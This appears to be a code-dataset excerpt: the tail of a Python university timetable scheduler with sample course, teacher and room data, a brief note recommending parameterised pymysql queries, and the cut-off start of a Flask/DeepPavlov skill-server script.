0\n\t\t\t\t\t\t\t\t\tfor e in FREE_TIME_GROUP[u]:\n\t\t\t\t\t\t\t\t\t\tif e == v:\n\t\t\t\t\t\t\t\t\t\t\tcheck = 1\n\t\t\t\t\t\t\t\t\tif check == 0:\n\t\t\t\t\t\t\t\t\t\tFREE_TIME_GROUP[u].append(v)\n\t\t\t\t\t\tif check_freeday == 0 and sec == \"AA\":\n\t\t\t\t\t\t\tif len(FREE_TIME_GROUP[u]) <= 2:\n\t\t\t\t\t\t\t\tFREE_TIME_GROUP[u] = []\n\t\t\t\t\t\telif check_freeday == 0 and sec == \"BB\":\n\t\t\t\t\t\t\tif len(FREE_TIME_GROUP[u]) <= 1:\n\t\t\t\t\t\t\t\tFREE_TIME_GROUP[u] = []\n\n\t\t\t\telif T[t] == \"2\":\n\t\t\t\t\tfor u in range(len(FREE_TIME[o])-1):\n\t\t\t\t\t\tsplit = []\n\t\t\t\t\t\tsplit.append(FREE_TIME[o][u][1])\n\t\t\t\t\t\tsplit.append(FREE_TIME[o][u+1][1])\n\t\t\t\t\t\tFREE_TIME_SPRIT[o].append(split)\n\t\t\t\t\tfor u in range(len(FREE_TIME_SPRIT)):\n\t\t\t\t\t\tfor v in FREE_TIME_SPRIT[u]:\n\t\t\t\t\t\t\tfor w in hr_2:\n\t\t\t\t\t\t\t\tif v == w:\n\t\t\t\t\t\t\t\t\tcheck = 0\n\t\t\t\t\t\t\t\t\tfor e in FREE_TIME_GROUP[u]:\n\t\t\t\t\t\t\t\t\t\tif e == v:\n\t\t\t\t\t\t\t\t\t\t\tcheck = 1\n\t\t\t\t\t\t\t\t\tif check == 0:\n\t\t\t\t\t\t\t\t\t\tFREE_TIME_GROUP[u].append(v)\n\n\t\t\t\telif T[t] == \"3\":\n\t\t\t\t\tfor u in range(len(FREE_TIME[o])-2):\n\t\t\t\t\t\tsplit = []\n\t\t\t\t\t\tsplit.append(FREE_TIME[o][u][1])\n\t\t\t\t\t\tsplit.append(FREE_TIME[o][u+1][1])\n\t\t\t\t\t\tsplit.append(FREE_TIME[o][u+2][1])\n\t\t\t\t\t\tFREE_TIME_SPRIT[o].append(split)\n\t\t\t\t\tfor u in range(len(FREE_TIME_SPRIT)):\n\t\t\t\t\t\tfor v in FREE_TIME_SPRIT[u]:\n\t\t\t\t\t\t\tfor w in hr_3:\n\t\t\t\t\t\t\t\tif v == w:\n\t\t\t\t\t\t\t\t\tcheck = 0\n\t\t\t\t\t\t\t\t\tfor e in FREE_TIME_GROUP[u]:\n\t\t\t\t\t\t\t\t\t\tif e == v:\n\t\t\t\t\t\t\t\t\t\t\tcheck = 1\n\t\t\t\t\t\t\t\t\tif check == 0:\n\t\t\t\t\t\t\t\t\t\tFREE_TIME_GROUP[u].append(v)\n\t\t\t\t\t\tif check_freeday == 0 and sec == \"AA\":\n\t\t\t\t\t\t\tif len(FREE_TIME_GROUP[u]) < 3:\n\t\t\t\t\t\t\t\tFREE_TIME_GROUP[u] = []\n\t\t\t\t\t\telif check_freeday == 0 and sec == \"BB\":\n\t\t\t\t\t\t\tif len(FREE_TIME_GROUP[u]) < 2:\n\t\t\t\t\t\t\t\tFREE_TIME_GROUP[u] = []\n\n\t\t\tfor a in range(len(FREE_TIME_GROUP)):\n\t\t\t\tfor o in range(len(FREE_TIME_GROUP[a])):\n\t\t\t\t\tfor u in range(len(FREE_TIME_GROUP[a][o])):\n\t\t\t\t\t\tFREE_TIME_GROUP[a][o][u] = str(a)+FREE_TIME_GROUP[a][o][u]\n\n\t\t\t#print (FREE_TIME_GROUP)\n\t\t\tnum_day = []\n\t\t\tfor z in range(len(FREE_TIME_GROUP)):\n\t\t\t\tif len(FREE_TIME_GROUP[z]) != 0:\n\t\t\t\t\tnum_day.append(z)\n\n\t\t\tsubject_time = []\n\t\t\tif len (num_day) != 0 and sec == \"AB\":\n\t\t\t\tsubject_time = FREE_TIME_GROUP[num_day[len(num_day)-1]][0]\n\t\t\telif len (num_day) != 0 and t == 0:\n\t\t\t\tsubject_time = FREE_TIME_GROUP[num_day[0]][0]\n\t\t\telif len (num_day) != 0 and t == 1:\n\t\t\t\tsubject_time = FREE_TIME_GROUP[num_day[len(num_day)-1]][0]\n\t\t\telse:\n\t\t\t\tpass\n\n\t\t\tif finish == 1 or finish == 3:\n\t\t\t\tfor b in range(len(all_teacher)-1):\n\t\t\t\t\tfor a in range(len(teacher_name)):\n\t\t\t\t\t\tif all_teacher[b] == teacher_name[a]:\n\t\t\t\t\t\t\tfor e in case1[b]:\n\t\t\t\t\t\t\t\tx = int(e[0])\n\t\t\t\t\t\t\t\ty = int(e[1])\n\t\t\t\t\t\t\t\ttimetable_teacher[a][x][y] = \"_BUSY_\"\n\n\t\t\t#print (subject_time)\n\t\t\tif subject_time != []:\n\t\t\t\tfor x in subject_time:\n\t\t\t\t\tsubject_description[i][6].append(x)\n\n\t\t\t\tfor a in subject_time:\n\t\t\t\t\to = int(a[0])\n\t\t\t\t\tu = int(a[1])\n\t\t\t\t\t#Update timetable_room\n\t\t\t\t\tif sec == \"AB\":\n\t\t\t\t\t\tMIX_SCHEDULE[A][o][u] = subject[0]\n\t\t\t\t\t\tMIX_SCHEDULE[B][o][u] = 
subject[0]\n\t\t\t\t\telif sec == \"AA\":\n\t\t\t\t\t\tMIX_SCHEDULE[A][o][u] = subject[0]\n\t\t\t\t\telif sec == \"BB\":\n\t\t\t\t\t\tMIX_SCHEDULE[B][o][u] = subject[0]\n\t\t\t\t\telif sec == \"CC\":\n\t\t\t\t\t\tMIX_SCHEDULE[C][o][u] = subject[0]\n\t\t\t\t\t#Update timetable_teacher\n\t\t\t\t\tfor a in range(len(teacher_name)):\n\t\t\t\t\t\tfor b in range(len(all_teacher)-1): \n\t\t\t\t\t\t\tif all_teacher[b] == teacher_name[a]:\n\t\t\t\t\t\t\t\ttimetable_teacher[a][o][u] = subject[0]\n\t\t\t\t\t#Update timetable_room\n\t\t\t\t\tfor e in range(len(room_code)):\n\t\t\t\t\t\tif subject[5] == room_code[e]:\n\t\t\t\t\t\t\ttimetable_room[e][o][u] = subject[0]\n\t\t\t\t\tfinish = 5\n\t\t\telif check_freeday == 0:\n\t\t\t\tcheck_freeday = 1\n\t\t\telse:\n\t\t\t\tif finish == 0:\n\t\t\t\t\t#print (\"case 1\")\n\t\t\t\t\tcase1 = [[]for d in range(len(all_teacher)-1)]\n\t\t\t\t\tfor b in range(len(all_teacher)-1):\n\t\t\t\t\t\tfor a in range(len(teacher_name)):\n\t\t\t\t\t\t\tif all_teacher[b] == teacher_name[a]:\n\t\t\t\t\t\t\t\tfor o in range(5):\n\t\t\t\t\t\t\t\t\tfor u in range(10):\n\t\t\t\t\t\t\t\t\t\tif timetable_teacher[a][o][u] == \"_BUSY_\":\n\t\t\t\t\t\t\t\t\t\t\ttimetable_teacher[a][o][u] = FREE\n\t\t\t\t\t\t\t\t\t\t\tcase1[b].append(timetable[o][u])\n\n\t\t\t\telif finish == 1:\n\t\t\t\t\t#print (\"case 2\")\n\t\t\t\t\thr_1.append([\"0\"])\n\t\t\t\t\thr_2.append([\"8\",\"9\"])\n\t\t\t\t\thr_3.append([\"0\",\"1\",\"2\"])\n\t\t\t\t\thr_3.append([\"7\",\"8\",\"9\"])\n\t\t\t\t\n\t\t\t\telif finish == 2:\n\t\t\t\t\t#print (\"case 3\")\n\t\t\t\t\tfor b in range(len(all_teacher)-1):\n\t\t\t\t\t\tfor a in range(len(teacher_name)):\n\t\t\t\t\t\t\tif all_teacher[b] == teacher_name[a]:\n\t\t\t\t\t\t\t\tfor e in case1[b]:\n\t\t\t\t\t\t\t\t\tx = int(e[0])\n\t\t\t\t\t\t\t\t\ty = int(e[1])\n\t\t\t\t\t\t\t\t\ttimetable_teacher[a][x][y] = FREE\n\t\t\t\telif finish == 3:\n\t\t\t\t\t#print (subject[0]+\"_Error\")\n\t\t\t\t\tpass\n\t\t\t\tfinish += 1\n\n\treturn ([MIX_SCHEDULE,subject_description,timetable_teacher,timetable_room])\n\ndef schedule(data):\n\t\n\t#extract data\n\tteacher_name = data[0]\n\tteacher_busy = data[1]\n\tsubject_description = data[2]\n\tcenter_subject = data[3]\n\troom_code = data[4]\n\tFREE = \" \"\n\n\tfor i in range(len(subject_description)):\n\t\tsubject_description[i].append([])\n\n\ttimetable = [[\"00\",\"01\",\"02\",\"03\",\"04\",\"05\",\"06\",\"07\",\"08\",\"09\"],\n\t\t\t\t[\"10\",\"11\",\"12\",\"13\",\"14\",\"15\",\"16\",\"17\",\"18\",\"19\"],\n\t\t\t\t[\"20\",\"21\",\"22\",\"23\",\"24\",\"25\",\"26\",\"27\",\"28\",\"29\"],\n\t\t\t\t[\"30\",\"31\",\"32\",\"33\",\"34\",\"35\",\"36\",\"37\",\"38\",\"39\"],\n\t\t\t\t[\"40\",\"41\",\"42\",\"43\",\"44\",\"45\",\"46\",\"47\",\"48\",\"49\"]]\n\n\t#Update timetable_teacher\n\ttimetable_teacher = [[[FREE] * 10 for i in range(5)]for i in range(len(teacher_busy))]\n\tfor a in range(len(teacher_busy)):\n\t\tfor e in teacher_busy[a]:\n\t\t\tfor i in range(5):\n\t\t\t\tfor o in range(10):\n\t\t\t\t\tif e == timetable[i][o]:\n\t\t\t\t\t\ttimetable_teacher[a][i][o] = \"_BUSY_\"\n\t\t\t\t\t\t\n\ttimetable_room = [[[FREE] * 10 for i in range(5)]for i in range(len(room_code))]\n\t\n\t#subject_do_not_use_this_time = [[]for i in range(len(subject_description))]\n\n\tMIX_SCHEDULE_KEY = [\"B1_secA\",\"B1_secB\",\"B2_secA\",\"B2_secB\",\"B3_secA\",\"B3_secB\",\"B4_secA\",\"B4_secB\",\"Master\",\"Doctorate\"]\n\tMIX_SCHEDULE = [[[FREE] * 10 for i in range(5)]for i in range(10)]\n\t\n\t#Update MIX_SCHEDULE with MONDAY_PM\n\tfor i in 
range(len(MIX_SCHEDULE)):\n\t\tfor o in (5,6,7,8,9):\n\t\t\tMIX_SCHEDULE[i][0][o] = \"_FULL_\"\n\n\t#Update MIX_SCHEDULE with CENTER_SUBJECT\n\tfor i in range(len(center_subject)):\n\t\tcenter_sub_level = center_subject[i][1]\n\t\tcenter_sub_sec = center_subject[i][2]\n\t\tfor a in center_subject[i][3]:\n\t\t\to = int(a[0])\n\t\t\tu = int(a[1])\n\t\t\tif center_sub_level == \"1\":\n\t\t\t\tif center_sub_sec == \"AB\":\n\t\t\t\t\tMIX_SCHEDULE[0][o][u] = center_subject[i][0]\n\t\t\t\t\tMIX_SCHEDULE[1][o][u] = center_subject[i][0]\n\t\t\t\telif center_sub_sec == \"AA\":\n\t\t\t\t\tMIX_SCHEDULE[0][o][u] = center_subject[i][0]\n\t\t\t\telif center_sub_sec == \"BB\":\n\t\t\t\t\tMIX_SCHEDULE[1][o][u] = center_subject[i][0]\n\t\t\t\n\t\t\telif center_sub_level == \"2\":\n\t\t\t\tif center_sub_sec == \"AB\":\n\t\t\t\t\tMIX_SCHEDULE[2][o][u] = center_subject[i][0]\n\t\t\t\t\tMIX_SCHEDULE[3][o][u] = center_subject[i][0]\n\t\t\t\telif center_sub_sec == \"AA\":\n\t\t\t\t\tMIX_SCHEDULE[2][o][u] = center_subject[i][0]\n\t\t\t\telif center_sub_sec == \"BB\":\n\t\t\t\t\tMIX_SCHEDULE[3][o][u] = center_subject[i][0]\n\n\t\t\telif center_sub_level == \"3\":\n\t\t\t\tif center_sub_sec == \"AB\":\n\t\t\t\t\tMIX_SCHEDULE[4][o][u] = center_subject[i][0]\n\t\t\t\t\tMIX_SCHEDULE[5][o][u] = center_subject[i][0]\n\t\t\t\telif center_sub_sec == \"AA\":\n\t\t\t\t\tMIX_SCHEDULE[4][o][u] = center_subject[i][0]\n\t\t\t\telif center_sub_sec == \"BB\":\n\t\t\t\t\tMIX_SCHEDULE[5][o][u] = center_subject[i][0]\n\n\t\t\telif center_sub_level == \"4\":\n\t\t\t\tif center_sub_sec == \"AB\":\n\t\t\t\t\tMIX_SCHEDULE[6][o][u] = center_subject[i][0]\n\t\t\t\t\tMIX_SCHEDULE[7][o][u] = center_subject[i][0]\n\t\t\t\telif center_sub_sec == \"AA\":\n\t\t\t\t\tMIX_SCHEDULE[6][o][u] = center_subject[i][0]\n\t\t\t\telif center_sub_sec == \"BB\":\n\t\t\t\t\tMIX_SCHEDULE[7][o][u] = center_subject[i][0]\n\n\t\t\telif center_sub_level == \"M\":\n\t\t\t\t\tMIX_SCHEDULE[8][o][u] = center_subject[i][0]\n\n\t\t\telif center_sub_level == \"D\":\n\t\t\t\t\tMIX_SCHEDULE[9][o][u] = center_subject[i][0]\n\n\t#find posititon of priority_room\n\tpriority_room = [\"FB306\",\"FB401\",\"FB402\",\"FB403-4\"]\n\tpriority_room_num = [99,99,99,99]\n\tfor i in range(len(room_code)):\n\t\tif room_code[i] == priority_room[0]:\n\t\t\tpriority_room_num[0] = i\n\t\telif room_code[i] == priority_room[1]:\n\t\t\tpriority_room_num[1] = i\n\t\telif room_code[i] == priority_room[2]:\n\t\t\tpriority_room_num[2] = i\n\t\telif room_code[i] == priority_room[3]:\n\t\t\tpriority_room_num[3] = i\n\t\n\t#sort subject position by priority_room\n\tAB_sub = []\n\tAA_BB_sub = []\n\n\tFB306_AA_BB_sub = []\n\tFB401_AA_BB_sub = []\n\tFB402_AA_BB_sub = []\n\tFB403_4_AA_BB_sub = []\n\tANOTHER_ROOM_AA_BB_sub = []\n\n\tFB306_AB_sub = []\n\tFB401_AB_sub = []\n\tFB402_AB_sub = []\n\tFB403_4_AB_sub = []\n\tANOTHER_ROOM_AB_sub = []\n\n\tfor i in range(len(subject_description)):\n\t\tif subject_description[i][4] == \"AB\":\n\t\t\tAB_sub.append(i)\n\t\telse :\n\t\t\tAA_BB_sub.append(i)\t\n\n\tfor i in AA_BB_sub:\n\t\tif subject_description[i][5] == \"FB306\":\n\t\t\tFB306_AA_BB_sub.append(i)\n\t\telif subject_description[i][5] == \"FB401\":\n\t\t\tFB401_AA_BB_sub.append(i)\n\t\telif subject_description[i][5] == \"FB402\":\n\t\t\tFB402_AA_BB_sub.append(i)\n\t\telif subject_description[i][5] == \"FB403-4\":\n\t\t\tFB403_4_AA_BB_sub.append(i)\n\t\telse :\n\t\t\tANOTHER_ROOM_AA_BB_sub.append(i)\n\tfor i in AB_sub:\n\t\tif subject_description[i][5] == \"FB306\":\n\t\t\tFB306_AB_sub.append(i)\n\t\telif 
subject_description[i][5] == \"FB401\":\n\t\t\tFB401_AB_sub.append(i)\n\t\telif subject_description[i][5] == \"FB402\":\n\t\t\tFB402_AB_sub.append(i)\n\t\telif subject_description[i][5] == \"FB403-4\":\n\t\t\tFB403_4_AB_sub.append(i)\n\t\telse :\n\t\t\tANOTHER_ROOM_AB_sub.append(i)\n\n\t#manage schedule\n\tfor i in FB306_AA_BB_sub:\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\tfor i in FB401_AA_BB_sub:\n\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\tfor i in FB402_AA_BB_sub:\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\tfor i in FB403_4_AA_BB_sub:\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\t#-----------------------------------------------------------------------------------------------#\n\n\tfor i in FB306_AB_sub:\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\tfor i in FB401_AB_sub:\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\tfor i in FB402_AB_sub:\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\tfor i in FB403_4_AB_sub:\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\t#-----------------------------------------------------------------------------------------------#\n\n\tfor i in ANOTHER_ROOM_AA_BB_sub:\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\tfor i in ANOTHER_ROOM_AB_sub:\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = 
manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\t#-----------------------------------------------------------------------------------------------#\n\n\t#show schedule\n\t#print_timetable(MIX_SCHEDULE,MIX_SCHEDULE_KEY)\n\t#print_timetable(timetable_teacher,teacher_name)\n\t#print_timetable(timetable_room,room_code)\n\t#for i in subject_description:\n\t#\tprint (i)\n\n\treturn([subject_description,center_subject])\n\n\"\"\"data = [#teacher_name = data[0]\n\t\t[\"Assoc. Prof. Dr.Siam Charoenseang\",\n\t\t\"Asst. Prof. Dr.Thavida Maneewarn\",\n\t\t\"Mr.Bawornsak Sakulkueakulsuk\",\n\t\t\"Dr.Pitiwut Teerakittikul\",\n\t\t\"Mr.Thanacha Choopojcharoen\",\n\t\t\"Asst.Prof.Dr.Eakkachai Pengwang\",\n\t\t\"Dr.Arbtip Dheeravongkit\",\n\t\t\"Dr.Supachai Vongbunyong\",\n\t\t\"Dr.Prakarnkiat Youngkong\",\n\t\t\"Mr.Worawit Panpanytep\",\n\t\t\"Dr.Warasinee Chaisangmongkon\",\n\t\t\"Dr.Orapadee Joochim\",\n\t\t\"Dr.Suriya Natsupakpong\",\n\t\t\"Dr.Boontariga Kasemsontitum\",\n\t\t\"Mr.Narongsak\",\n\t\t\"Dr.Pornpoj\",\n\t\t\"Ms.Mirawee Kumpakure\",\n\t\t\"Dr.Arbtip Dheeravongkit\"\n\t\t],\n\t\t\n\t\t#teacher_busy = data[1]\n\t\t[\n\t\t[\"00\",\"01\",\"02\"],\n\t\t[\"00\",\"34\",\"35\",\"36\"],\n\t\t[\"41\",\"42\",\"43\",\"44\",\"45\"],\n\t\t[\"40\",\"41\",\"42\",\"43\",\"44\"],\n\t\t[\"41\",\"42\",\"43\",\"44\"],\n\t\t[\"01\",\"02\",\"03\"],\n\t\t[\"45\",\"46\",\"47\",\"48\"],\n\t\t[\"20\",\"21\",\"22\",\"23\"],\n\t\t[\"10\",\"11\",\"12\"],\n\t\t[\"30\",\"31\",\"32\",\"33\"],\n\t\t[\"00\",\"01\",\"02\",\"03\",\"04\"],\n\t\t[\"21\",\"34\",\"35\",\"36\"],\n\t\t[\"21\",\"34\",\"35\",\"36\"],\n\t\t[\"47\",\"48\",\"49\"],\n\t\t[\"37\",\"38\",\"39\",\"40\",\"41\",\"42\"],\n\t\t[\"10\",\"11\",\"12\",\"13\"],\n\t\t[\"05\",\"06\",\"07\",\"08\"],\n\t\t[\"27\",\"28\",\"29\"]\n\t\t],\n\t\t\n\t\t\n\t\t#subject_description = data[2]\n\t\t[\n\t\t[\"FRA141\",\"1\",\"Dr.Warasinee Chaisangmongkon,\", \"2/2\",\"AA\",\"FB306\"],\n\t\t[\"FRA141\",\"1\",\"Mr.Bawornsak Sakulkueakulsuk,\", \"2/2\",\"BB\",\"FB306\"],\n\t\t[\"FRA161\",\"1\",\"Dr.Prakarnkiat Youngkong,\", \"3/1\",\"AA\",\"FB403-4\"],\n\t\t[\"FRA161\",\"1\",\"Asst.Prof.Dr.Eakkachai Pengwang,\", \"3/1\",\"BB\",\"FB301\"],\n\t\t[\"FRA221\",\"2\",\"Dr.Pitiwut Teerakittikul,\", \"3\",\"AA\",\"FB306\"],\n\t\t[\"FRA221\",\"2\",\"Dr.Pitiwut Teerakittikul,\", \"3\",\"BB\",\"FB306\"],\n\t\t[\"FRA222\",\"2\",\"Asst. Prof. Dr.Thavida Maneewarn,\", \"3\",\"AA\",\"FB301\"],\n\t\t[\"FRA222\",\"2\",\"Asst. Prof. 
Dr.Thavida Maneewarn,\", \"3\",\"BB\",\"FB301\"],\n\t\t[\"FRA231\",\"2\",\"Asst.Prof.Dr.Eakkachai Pengwang,\", \"3\",\"AB\",\"FB403-4\"],\n\t\t[\"FRA241\",\"2\",\"Mr.Bawornsak Sakulkueakulsuk,\", \"3\",\"AB\",\"FB401\"],\n\t\t[\"FRA261\",\"2\",\"Dr.Pitiwut Teerakittikul,\", \"3\",\"AA\",\"FB306\"],\n\t\t[\"FRA261\",\"2\",\"Dr.Pitiwut Teerakittikul,\", \"3\",\"BB\",\"FB306\"],\n\t\t[\"FRA321\",\"3\",\"Dr.Suriya Natsupakpong,\", \"3\",\"AA\",\"FB304\"],\n\t\t[\"FRA321\",\"3\",\"Mr.Worawit Panpanytep,\", \"3\",\"BB\",\"FB304\"],\n\t\t[\"FRA331\",\"3\",\"Mr.Thanacha Choopojcharoen,\", \"3\",\"AA\",\"FB305\"],\n\t\t[\"FRA331\",\"3\",\"Mr.Thanacha Choopojcharoen,\", \"3\",\"BB\",\"FB305\"],\n\t\t[\"FRA332\",\"3\",\"Dr.Arbtip Dheeravongkit,\", \"3\",\"AA\",\"FB305\"],\n\t\t[\"FRA332\",\"3\",\"Asst.Prof.Dr.Eakkachai Pengwang,\", \"3\",\"BB\",\"FB305\"],\n\t\t[\"FRA341\",\"3\",\"Dr.Pornpoj,\", \"3\",\"AA\",\"FB301\"],\n\t\t[\"FRA341\",\"3\",\"Dr.Pornpoj,\", \"3\",\"BB\",\"FB301\"],\n\t\t[\"FRA361\",\"3\",\"Mr.Narongsak,\", \"3\",\"AB\",\"FB401\"],\n\t\t[\"FRA451\",\"4\",\"Dr.Boontariga Kasemsontitum,Dr.Suriya Natsupakpong,\", \"3\",\"AB\",\"FB306\"],\n\t\t[\"FRA452\",\"4\",\"Dr.Supachai Vongbunyong,\", \"3\",\"AB\",\"FB305\"],\n\t\t[\"FRA522\",\"M\",\"Dr.Orapadee Joochim,\", \t\"3\",\"CC\",\"FB301\"],\n\t\t[\"FRA543\",\"M\",\"Dr.Supachai Vongbunyong,\", \"3/1\",\"CC\",\"FB304\"],\n\t\t[\"FRA621\",\"D\",\"Dr.Orapadee Joochim,\", \t\"3/1\",\"CC\",\"FB305\"],\n\t\t[\"FRA641\",\"D\",\"Assoc. Prof. Dr.Siam Charoenseang\", \"3\",\"CC\",\"FB304\"],\n\t\t],\n\t\t\n\t\t#center_subject = data[3]\n\t\t[\n\t\t[\"GEN101\",\"1\",\"AB\",[\"27\",\"28\"]],\n\t\t[\"LNG101\",\"1\",\"AB\",[\"41\",\"42\",\"43\"]],\n\t\t[\"MTH101\",\"1\",\"AB\",[\"22\",\"23\",\"45\",\"46\"]],\n\t\t[\"PHY103\",\"1\",\"AA\",[\"10\",\"11\",\"47\"]],\n\t\t[\"PHY103\",\"1\",\"BB\",[\"00\",\"01\",\"48\"]],\n\t\t[\"PHY191\",\"1\",\"AB\",[\"02\",\"03\"]],\n\t\t[\"LNG1-2\",\"1\",\"AB\",[\"41\",\"42\",\"43\"]],\n\t\t[\"LNG2-3\",\"2\",\"AB\",[\"30\",\"31\",\"32\"]],\n\t\t[\"MTH201\",\"2\",\"AB\",[\"25\",\"26\",\"27\",\"47\"]],\n\t\t[\"LNG103\",\"3\",\"AB\",[\"31\",\"32\",\"33\"]]\n\t\t],\n\n\t\t#room = data[4]\n\t\t[\n\t\t\"FB301\",\n\t\t\"FB304\",\n\t\t\"FB305\",\n\t\t\"FB306\",\n\t\t\"FB401\",\n\t\t\"FB402\",\n\t\t\"FB403-4\"\n\t\t]\n\t\t]\"\"\"\ndata = call_data()\noutput = schedule(data)\nsave_output(output)\n#print (\"Finish :D\")\n\n","sub_path":"FRA241-Integrate-master/FRA241-Integrate-master/Algorithm.py","file_name":"Algorithm.py","file_ext":"py","file_size_in_byte":32002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
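The record above builds every INSERT by %-formatting values straight into the SQL string and wraps each database call in a bare except that prints only 'Error'. pymysql can bind the values itself, which removes the quoting and injection problems, and catching pymysql.Error keeps the real failure visible. A sketch using one row of the sample data shown above:

import pymysql

conn = pymysql.connect(host='localhost', user='root', db='schedule')
try:
    with conn.cursor() as cur:
        # %s placeholders are filled in by the driver, not by string formatting
        cur.execute(
            """INSERT INTO `table_subject_description_output`
               (`No`, `subject_level`, `subject_code`, `subject_room`,
                `subject_hour_per_week`, `subject_hour_per_day`,
                `subject_sec`, `Day`, `start_time`)
               VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)""",
            (1, '1', 'FRA141', 'FB306', '2/2', '2', 'AA', '0', '1'))
    conn.commit()
except pymysql.Error as exc:
    print('MySQL error:', exc)      # report what actually went wrong
finally:
    conn.close()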
+{"seq_id":"591993814","text":"import os\nimport re\n# from multiprocessing import Process\nfrom pathlib import Path\nfrom itertools import islice\nfrom typing import Union, Optional, Dict\nfrom logging import getLogger\nimport ssl\nimport argparse\n\nfrom flasgger import Swagger, swag_from\nfrom flask import Flask, request, jsonify, redirect\nfrom flask_cors import CORS\nfrom deeppavlov.core.commands.infer import build_model\nfrom deeppavlov.core.common.chainer import Chainer\n\n# from core.config import ANNOTATORS, SKILL_SELECTORS, SKILLS, RESPONSE_SELECTORS, POSTPROCESSORS\n\n# from utils.server_utils.server import skill_server\nlog = getLogger(__name__)\napp = Flask(__name__)\nSwagger(app)\nCORS(app)\n\npattern = re.compile(r'^https?://(?P.*):(?P\\d*)(?P.*)$')\n\nparser = argparse.ArgumentParser()\nparser.add_argument('config', type=str)\nparser.add_argument('-p', '--port', type=int)\nparser.add_argument('-host', '--host', type=str)\nparser.add_argument('-ep', '--endpoint', type=str)\n\n\ndef _get_ssl_context(ssl_key, ssl_cert):\n ssh_key_path = Path(ssl_key).resolve()\n if not ssh_key_path.is_file():\n e = FileNotFoundError('Ssh key file not found: please provide correct path in --key param or '\n 'https_key_path param in server configuration file')\n log.error(e)\n raise e\n\n ssh_cert_path = Path(ssl_cert).resolve()\n if not ssh_cert_path.is_file():\n e = FileNotFoundError('Ssh certificate file not found: please provide correct path in --cert param or '\n 'https_cert_path param in server configuration file')\n log.error(e)\n raise e\n\n ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)\n ssl_context.load_cert_chain(ssh_cert_path, ssh_key_path)\n return ssl_context\n\n\ndef interact_skill(model: Chainer, batch_size: Optional[int] = None):\n if not request.is_json:\n log.error(\"request Content-Type header is not application/json\")\n return jsonify({\n \"error\": \"request Content-Type header is not application/json\"\n }), 400\n\n data = request.get_json()\n try:\n dialog_states = iter(data['dialogs'])\n except (KeyError, TypeError):\n return jsonify({\n 'error': 'illegal payload format'\n }), 500\n\n responses = []\n while True:\n batch = list(islice(dialog_states, batch_size))\n if not batch:\n break\n try:\n result = model(batch)\n except Exception as e:\n log.error(f'Got an exception when trying to infer the model: {type(e).__name__}: {e}')\n return jsonify({\n 'error': f'{type(e).__name__}: {e}'\n }), 500\n if len(model.out_params) == 1:\n result = [result]\n responses += [dict(zip(model.out_params, response)) for response in zip(*result)]\n\n return jsonify({\n 'responses': responses\n }), 200\n\n\ndef skill_server(config: Union[dict, str, Path], https=False, ssl_key=None, ssl_cert=None, *,\n host: Optional[str] = None, port: Optional[int] = None, endpoint: Optional[str] = None,\n download: bool = True, batch_size: Optional[int] = None, env: Optional[Dict[str, str]] = None):\n if env:\n os.environ.update(env)\n host = host or '0.0.0.0'\n port = port or 80\n endpoint = f'/{endpoint}' or '/skill'\n if batch_size is not None and batch_size < 1:\n log.warning(f'batch_size of {batch_size} is less than 1 and is interpreted as unlimited')\n batch_size = None\n\n ssl_context = _get_ssl_context(ssl_key, ssl_cert) if https else 